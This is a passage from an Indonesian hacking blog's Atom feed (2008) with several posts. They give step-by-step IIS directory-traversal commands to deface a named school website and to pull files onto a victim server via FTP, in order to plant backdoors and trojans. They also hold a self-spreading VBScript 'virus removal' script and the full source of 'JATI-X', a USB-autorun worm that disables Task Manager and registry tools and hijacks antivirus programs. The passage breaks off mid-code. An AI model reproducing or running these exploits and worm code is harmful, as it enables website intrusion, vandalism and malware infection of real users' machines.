/&gt;/winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjati.ftp&lt;br /&gt;            Setelah selesai script tuh kita jalan kan lagi script nya:            &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjati.ftp&lt;br /&gt;            buka ie satulagi untuk liat file nya dah smapai belum            &lt;a href="http://www.targethost.com/scripts/..%255c..%255c"&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;/a&gt;&lt;br /&gt;/winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot            Kalau dah terkirim selamat dah&lt;br /&gt;Keterangan nya :Pada scrip jati.ftp itu kita muatkan hal ini sebenarnyaopen geocities.com   ---&gt;&gt;&gt; scriptnya ---&gt;&gt;&lt;br /&gt;+echo+open+geocities.com+&gt;&gt;+c:inetpubwwwrootjati.ftpjati ---&gt;&gt; user name   ---&gt;&gt;&gt; scriptnya --&gt;&gt; +echo+jati+&gt;&gt;+c:inetpubwwwrootjati.ftpanuamakang ---&gt;&gt;&gt; password ---&gt;&gt;&gt; scriptnya --&gt;&gt;&lt;br /&gt;+echo+anuamakang+&gt;&gt;+c:inetpubwwwrootjati.ftplcd c:inetpubwwwroot  ---&gt;&gt;&gt; folder tujuan ---&gt;&gt;&gt; scriptnya&lt;br /&gt;--&gt;&gt;&gt;+echo+lcd+c:inetpubwwwroot+&gt;&gt;+c:inetpubwwwrootjati.ftpascii ---&gt;&gt;&gt; bentuk file ---&gt;&gt;&gt; scripnya ---&gt;&gt;&gt; +echo+ascii+&gt;&gt;+c:inetpubwwwrootjati.ftpget jati.htm ----&gt;&gt;&gt; command tranfer file ---&gt;&gt;&gt; +echo+get+jati.htm+&gt;&gt;+c:inetpubwwwrootjati.ftpclose ---&gt;&gt; perintah dc ke web server ----&gt;&gt;&gt; scripnya ---&gt;&gt;&gt;&lt;br /&gt;+echo+close+&gt;&gt;+c:inetpubwwwrootjati.ftp&lt;br /&gt;hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror,&lt;br /&gt;ircserver, bot, bnc, psybnc, trojan and virus deh..........&lt;br /&gt;untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary&lt;br /&gt;Catatan : - Daftar Pustaka  .) Tutorial R3VOLT Anggota #Medanhacking  .) Tutorial Pak_Tani Anggota #Cracxer  .) Tutoriaal Dis0RdeR Anggota #Medanhacking  .) Tutorial Rio_Martin Anggota #IndoSnifing&lt;br /&gt; - Revisi Dan Tambahan Serta edit Dari Jati - Kalau Mau Download Software IIS Scaner Di Web Site  . &lt;a href="http://www.elhacker.net/"&gt;WWW.ElHACKER.NET&lt;/a&gt;  . &lt;a href="http://www.kebam.net/"&gt;WWW.KEBAM.NET&lt;/a&gt; - Jangan Jadi Cracker Yang merusak kerja nya&lt;br /&gt;Okde........... Wasalam....... See You In Next Tutorial ( Script Kidies ) ........................:::::::VIVA #MINANGCREW And #HACKERMUDA:::::::::.............    Link Web• Aikmel Community • Antihackerlink • Echo • Forum Diskusi Linux • HarryChanPutra • HarryChanPutra • I S I C • id-ubuntu • Indo BSD • Jasakom • Konsultan Linux • w[X]f project • XNUXER ________________________________________&lt;br /&gt; &lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-215547362920563726?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/215547362920563726/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/12/deface-website.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/215547362920563726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/215547362920563726'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/12/deface-website.html' title='DEFACE WEBSITE'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-4401003491634090395</id><published>2008-12-28T15:30:00.001+07:00</published><updated>2008-12-28T17:06:27.566+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MEMBUAT VIRUS'/><title type='text'>MEMBUAT VIRUS WORM DENGAN NOTEPAD</title><content type='html'>'******************************************************************&lt;br /&gt;'********************* Virus Removal VBScript *********************&lt;br /&gt;'************************** Version 1.00 **************************&lt;br /&gt;'******************************************************************&lt;br /&gt;'This antivirus program is intended to repair your computer from&lt;br /&gt;'any sorts of virus attacks.&lt;br /&gt;'This program is exactly like a normal virus but it repairs things&lt;br /&gt;'rather than destroying them.&lt;br /&gt;'******************************************************************&lt;br /&gt;'******************************************************************&lt;br /&gt;'Program developed by&lt;br /&gt;'Sujin Joshi&lt;br /&gt;'http://Sujin.com.np&lt;br /&gt;'sujinjoshi@gmail.com&lt;br /&gt;Option Explicit&lt;br /&gt;On Error Resume Next&lt;br /&gt;&lt;br /&gt;Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root&lt;br /&gt;&lt;br /&gt;Set Fso = CreateObject("Scripting.FileSystemObject")&lt;br /&gt;Set Shells = CreateObject("Wscript.Shell")&lt;br /&gt;Set WinDir = Fso.GetSpecialFolder(0)&lt;br /&gt;Set SystemDir =Fso.GetSpecialFolder(1)&lt;br /&gt;Set File = Fso.GetFile(WScript.ScriptFullName)&lt;br /&gt;Set Drv = File.Drive&lt;br /&gt;Set InDrive = Fso.drives&lt;br /&gt;Set ReadAll = File.OpenAsTextStream(1,-2)&lt;br /&gt;do while not ReadAll.atendofstream&lt;br /&gt;AllFile = AllFile &amp;amp; ReadAll.readline&lt;br /&gt;AllFile = AllFile &amp;amp; vbcrlf&lt;br /&gt;Loop&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Count=Drv.DriveType&lt;br /&gt;&lt;br /&gt;Do&lt;br /&gt;            If Not Fso.FileExists(SystemDir &amp;amp; "\VirusRemoval.vbs") then&lt;br /&gt;                        set WriteAll = Fso.CreateTextFile(SystemDir &amp;amp; "\VirusRemoval.vbs",2,true)&lt;br /&gt;                        WriteAll.Write AllFile&lt;br /&gt;                        WriteAll.close&lt;br /&gt;                        set WriteAll = Fso.GetFile(SystemDir &amp;amp; "\VirusRemoval.vbs")&lt;br /&gt;                        WriteAll.Attributes = -1&lt;br /&gt;            End If&lt;br /&gt;&lt;br /&gt;            Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"&lt;br /&gt;            Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"&lt;br /&gt;            Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"&lt;br /&gt;            Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"&lt;br /&gt;            Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"&lt;br /&gt;            Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"&lt;br /&gt;            Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir &amp;amp; "\userinit.exe," &amp;amp; _&lt;br /&gt;            SystemDir &amp;amp; "\wscript.exe " &amp;amp; SystemDir &amp;amp; "\VirusRemoval.vbs"&lt;br /&gt;&lt;br /&gt;            For Each Drives In InDrive&lt;br /&gt;                        root = Drives.Path &amp;amp; "\"&lt;br /&gt;                        If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then&lt;br /&gt;                                    Shells.Run "explorer.exe " &amp;amp; root&lt;br /&gt;                        End If&lt;br /&gt;                        Set folder=Fso.GetFolder(root)&lt;br /&gt;                        Set Delete = Fso.DeleteFile(SystemDir &amp;amp; "\killvbs.vbs",true)&lt;br /&gt;                        For Each files In folder.Files&lt;br /&gt;                                    auto=Left(files.Name,7)&lt;br /&gt;                                    If UCase(auto)=UCase("autorun") Then&lt;br /&gt;                                                Set Delete = Fso.DeleteFile(root &amp;amp; files.Name,true)&lt;br /&gt;                                    End If  &lt;br /&gt;                        Next&lt;br /&gt;                        If Drives.DriveType=2 Then&lt;br /&gt;                                    delext "inf",Drives.Path &amp;amp; "\"&lt;br /&gt;                                    delext "INF",Drives.Path &amp;amp; "\"&lt;br /&gt;                        End if &lt;br /&gt;&lt;br /&gt;                        If Drives.DriveType = 1 Or Drives.DriveType = 2 Then&lt;br /&gt;                                    If Drives.Path&lt;&gt; "A:" Then&lt;br /&gt;                                                delext "vbs",WinDir &amp;amp; "\"&lt;br /&gt;                                                delext "vbs",Drives.Path  &amp;amp; "\"&lt;br /&gt;                                               &lt;br /&gt;                                                If Fso.FileExists(Drives.Path &amp;amp; "\ravmon.exe") Then&lt;br /&gt;                                                            Fso.DeleteFile(Drives.Path &amp;amp; "\ravmon.exe")&lt;br /&gt;                                                End If&lt;br /&gt;                                                If Fso.FileExists(Drives.Path &amp;amp; "\sxs.exe") Then&lt;br /&gt;                                                            Fso.DeleteFile(Drives.Path &amp;amp; "\sxs.exe")&lt;br /&gt;                                                End If&lt;br /&gt;                                                If Fso.FileExists(Drives.Path &amp;amp; "\winfile.exe") Then&lt;br /&gt;                                                            Fso.DeleteFile(Drives.Path &amp;amp; "\winfile.exe")&lt;br /&gt;                                                End If&lt;br /&gt;                                                If Fso.FileExists(Drives.Path &amp;amp; "\run.wsh") Then&lt;br /&gt;                                                            Fso.DeleteFile(Drives.Path &amp;amp; "\run.wsh")&lt;br /&gt;                                                End If&lt;br /&gt;                                               &lt;br /&gt;                                                If Drives.DriveType = 1 Then&lt;br /&gt;                                                            If Drives.Path&lt;&gt;"A:" Then&lt;br /&gt;                                                                        If Not Fso.FileExists(Drives.Path &amp;amp; "\VirusRemoval.vbs") Then&lt;br /&gt;                                                                                    Set WriteAll=Fso.CreateTextFile(Drives.Path &amp;amp; "\VirusRemoval.vbs",2,True)&lt;br /&gt;                                                                                    WriteAll.Write AllFile&lt;br /&gt;                                                                                    WriteAll.Close&lt;br /&gt;                                                                                    Set WriteAll = Fso.GetFile(Drives.Path &amp;amp; "\VirusRemoval.vbs")&lt;br /&gt;                                                                                    WriteAll.Attributes = -1&lt;br /&gt;                                                                        End If&lt;br /&gt;                                                &lt;br /&gt;                                                                        If Fso.FileExists(Drives.Path &amp;amp; "\autorun.inf") Or Fso.FileExists(Drives.Path &amp;amp; "\AUTORUN.INF") Then&lt;br /&gt;                                                                                    Set Chg = Fso.GetFile(Drives.Path &amp;amp; "\autorun.inf")&lt;br /&gt;                                                                                    Chg.Attributes = -8&lt;br /&gt;                                                                                    Set WriteAll = Fso.CreateTextFile(Drives.Path &amp;amp; "\autorun.inf",2,True)&lt;br /&gt;                                                                                    WriteAll.writeline "[autorun]"&lt;br /&gt;                                                                                    WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"&lt;br /&gt;                                                                                    WriteAll.WriteLine "shell\open=Open"&lt;br /&gt;                                                                                    WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"&lt;br /&gt;                                                                                    WriteAll.Close&lt;br /&gt;                                                                                    Set WriteAll = Fso.GetFile(Drives.Path &amp;amp; "\autorun.inf")&lt;br /&gt;                                                                                    WriteAll.Attributes = -1&lt;br /&gt;                                                                        else&lt;br /&gt;                                                                                    Set WriteAll = Fso.CreateTextFile(Drives.Path &amp;amp; "\autorun.inf",2,True)&lt;br /&gt;                                                                                    WriteAll.writeline "[autorun]"&lt;br /&gt;                                                                                    WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"&lt;br /&gt;                                                                                    WriteAll.WriteLine "shell\open=Open"&lt;br /&gt;                                                                                    WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"&lt;br /&gt;                                                                                    WriteAll.Close&lt;br /&gt;                                                                                    Set WriteAll = Fso.GetFile(Drives.Path &amp;amp; "\autorun.inf")&lt;br /&gt;                                                                                    WriteAll.Attributes = -1&lt;br /&gt;                                                                        End if&lt;br /&gt;                                                            End If&lt;br /&gt;                                                End If&lt;br /&gt;                                    End if &lt;br /&gt;                        End If&lt;br /&gt;            Next&lt;br /&gt;&lt;br /&gt;            if Count &lt;&gt; 1 then&lt;br /&gt;            Wscript.sleep 10000&lt;br /&gt;            end if&lt;br /&gt;loop while Count&lt;&gt;1&lt;br /&gt;&lt;br /&gt;sub delext(File2Find, SrchPath)&lt;br /&gt;   Dim oFileSys, oFolder, oFile,Cut,Delete&lt;br /&gt;   Set oFileSys = CreateObject("Scripting.FileSystemObject")&lt;br /&gt;   Set oFolder = oFileSys.GetFolder(SrchPath)&lt;br /&gt;   For Each oFile In oFolder.Files&lt;br /&gt;                        Cut=Right(oFile.Name,3)&lt;br /&gt;                        If UCase(Cut)=UCase(file2find) Then&lt;br /&gt;                                    If oFile.Name &lt;&gt; "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath &amp;amp; oFile.Name,true)&lt;br /&gt;                        End If&lt;br /&gt;   Next&lt;br /&gt;End sub&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-4401003491634090395?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/4401003491634090395/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/12/membuat-virus-worm-dengan-notepad.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/4401003491634090395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/4401003491634090395'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/12/membuat-virus-worm-dengan-notepad.html' title='MEMBUAT VIRUS WORM DENGAN NOTEPAD'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-587213909271101380</id><published>2008-12-28T15:27:00.001+07:00</published><updated>2008-12-28T15:29:47.587+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MEMBUAT VIRUS'/><title type='text'>VIRUS WORM</title><content type='html'>&lt;div align="center"&gt;&lt;strong&gt;Cara membuat Virus Worm&lt;/strong&gt; &lt;/div&gt;WARNING : GUNAKAN UNTUK MENAMBAH PENGETAHUAN, BUKAN UNTUK MERUGIKAN ORANG LAIN&lt;br /&gt;Bro ... Kamu pasti inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.&lt;br /&gt;Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.&lt;br /&gt;Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.&lt;br /&gt;Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.&lt;br /&gt;Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.&lt;br /&gt;Atau gunakan search engine &lt;a href="http://www.google.com/"&gt;http://www.google.com&lt;/a&gt; dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya&lt;br /&gt;&lt;br /&gt;sumber : &lt;a href="http://www.klik-kanan.com/"&gt;www.klik-kanan.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-587213909271101380?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/587213909271101380/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/12/virus-worm.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/587213909271101380'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/587213909271101380'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/12/virus-worm.html' title='VIRUS WORM'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-3444625349345199952</id><published>2008-12-07T12:33:00.003+07:00</published><updated>2008-12-08T12:36:43.162+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>CARA MENGHACK WEBSITE</title><content type='html'>Kamu mau blajar jd hacker?&lt;br /&gt;oke deh saya kasih tau caranya tp ini hanya untuk belajar bukan untuk merusak web orang.&lt;br /&gt;jd pastikan kamu backup dlu halaman web yg kamu hack.&lt;br /&gt;ingat kamu hanya mengingatkan sipunya web utk menambah keamanan servernya.&lt;br /&gt;oke kita mulai.&lt;br /&gt;1. tentukan target web kamu misalnya www.smpn19bogor.com&lt;br /&gt;2. kita deface web tsb dg perintah echo jadi kamu tuliskan diurl/ adress&lt;br /&gt;http://www.smpn19bogor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c&lt;br /&gt;jika muncul cgi eror brarti kamu telah menembus web itu. dan muncul isi hardisk dlm format dos&lt;br /&gt;jika belum brarti web itu udh divulner jd ganti target yg lainya.&lt;br /&gt;3. stlh itu cari path translade dg alamat&lt;br /&gt;http://www.smpn19bogor.com/_vtì_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set&lt;br /&gt;nanti keluar cgi eror dan keluar macam2 isi hardisk yg perlu dilihat path_translade=d:wwwsmpn19bogor&lt;br /&gt;4. langkah selanjutnya copy file cmd.exe menjadi jati.exe alamatnya&lt;br /&gt;http://www.smpn19bogor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jati.exe&lt;br /&gt;5. gunakan direktori inetpub&lt;br /&gt;http://www.smpn19bogor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+dir+c:inetpub&lt;br /&gt;terus dg alamat diatas cm inetpub diganti inetpubwwwroot&lt;br /&gt;terus lakukan alamat diatas dg mengganti inetpubwwwroot mjd inetpubwwwrootindex.htm&lt;br /&gt;6. skr tinggal kita deface atau echo&lt;br /&gt;http://www.smpn19bogor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jati.exe?/c+echo+Kamu%20telah%20Dihack%20Oleh%20Jati+&gt;+c:inetpubwwwrootindex.htm&lt;br /&gt;Nah sekarang kamu telah berhasil ngedeface webnya&lt;br /&gt;kalo mau lihat hasilnya langsung buka aja http://www.smpn19.com&lt;br /&gt;oke sekian tutorial hackernya&lt;br /&gt;kalo mau hasilnya keren blajar dulu html&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-3444625349345199952?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/3444625349345199952/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2008/12/cara-menghack-website.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/3444625349345199952'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/3444625349345199952'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2008/12/cara-menghack-website.html' title='CARA MENGHACK WEBSITE'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-6117538238367773620</id><published>2008-12-05T09:16:00.002+07:00</published><updated>2008-12-05T09:23:28.810+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CARA MUDAH BUAT VIRUS'/><title type='text'>CARA MUDAH BUAT VIRUS</title><content type='html'>CARA MEMBUAT VIRUS&lt;br /&gt;Nah kita akan buat virus JATI-X.VBS.&lt;br /&gt;Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggal Copy &gt; Paste….&lt;br /&gt;‘JATI-X&lt;br /&gt;‘Varian dari JATI.VBS&lt;br /&gt;on error resume next&lt;br /&gt;‘Dim kata-kata berikut&lt;br /&gt;dim rekur,windowpath,desades,fs,mf,isi,tf,JATI,nt,check,sd&lt;br /&gt;’siapkan isi autorun&lt;br /&gt;isi = “[autorun]” &amp; vbcrlf &amp; “shellexecute=wscript.exe jatims32.dll.vbs”&lt;br /&gt;set fs = createobject(”Scripting.FileSystemObject”)&lt;br /&gt;set mf = fs.getfile(Wscript.ScriptFullname)&lt;br /&gt;dim text,size&lt;br /&gt;size = mf.size&lt;br /&gt;check = mf.drive.drivetype&lt;br /&gt;set text = mf.openastextstream(1,-2)&lt;br /&gt;do while not text.atendofstream&lt;br /&gt;rekur = rekur &amp; text.readline&lt;br /&gt;rekur = rekur &amp; vbcrlf&lt;br /&gt;loop&lt;br /&gt;do&lt;br /&gt;‘buat file induk&lt;br /&gt;Set windowpath = fs.getspecialfolder(0)&lt;br /&gt;set tf = fs.getfile(windowpath &amp; “\JATI-x.dll.vbs “)&lt;br /&gt;tf.attributes = 32&lt;br /&gt;set tf = fs.createtextfile(windowpath &amp; “\JATI -x.dll.vbs”,2,true)&lt;br /&gt;tf.write rekur&lt;br /&gt;tf.close&lt;br /&gt;set tf = fs.getfile(windowpath &amp; “\JATI -x.dll.vbs”)&lt;br /&gt;tf.attributes = 39&lt;br /&gt;’sebar ke removable disc ditambahkan dengan Autorun.inf&lt;br /&gt;for each desades in fs.drives&lt;br /&gt;If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path &lt;&gt; “A:” then&lt;br /&gt;set tf=fs.getfile(desades.path &amp;”\jatims32.dll.vbs”)&lt;br /&gt;tf.attributes =32&lt;br /&gt;set tf=fs.createtextfile(desades.path &amp;”\jatims32.dll.vbs”,2,true)&lt;br /&gt;tf.write rekur&lt;br /&gt;tf.close&lt;br /&gt;set tf=fs.getfile(desades.path &amp;”\jatims32.dll.vbs”)&lt;br /&gt;tf.attributes = 39&lt;br /&gt;set tf =fs.getfile(desades.path &amp;”\autorun.inf”)&lt;br /&gt;tf.attributes = 32&lt;br /&gt;set tf=fs.createtextfile(desades.path &amp;”\autorun.inf”,2,true)&lt;br /&gt;tf.write isi&lt;br /&gt;tf.close&lt;br /&gt;set tf = fs.getfile(desades.path &amp;”\autorun.inf”)&lt;br /&gt;tf.attributes=39&lt;br /&gt;end if&lt;br /&gt;next&lt;br /&gt;‘Manipulasi Registry&lt;br /&gt;set JATI = createobject(”WScript.Shell”)&lt;br /&gt;‘Ubah Internet Explorer Title&lt;br /&gt;JATI.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: -&gt;JATI-X&lt;- ::”&lt;br /&gt;‘File Hidden tak terlihat&lt;br /&gt;JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”&lt;br /&gt;‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan&lt;br /&gt;JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”&lt;br /&gt;JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”&lt;br /&gt;JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”&lt;br /&gt;JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”&lt;br /&gt;JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”&lt;br /&gt;JATI.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”&lt;br /&gt;‘Buat pesan saat Windows Startup&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE JATI-X”&lt;br /&gt;JATI.regWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”&lt;br /&gt;‘Aktifkan saat Windows Startup&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath &amp; “\batch- JATI.-x.dll.vbs”&lt;br /&gt;‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”&lt;br /&gt;JATI.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 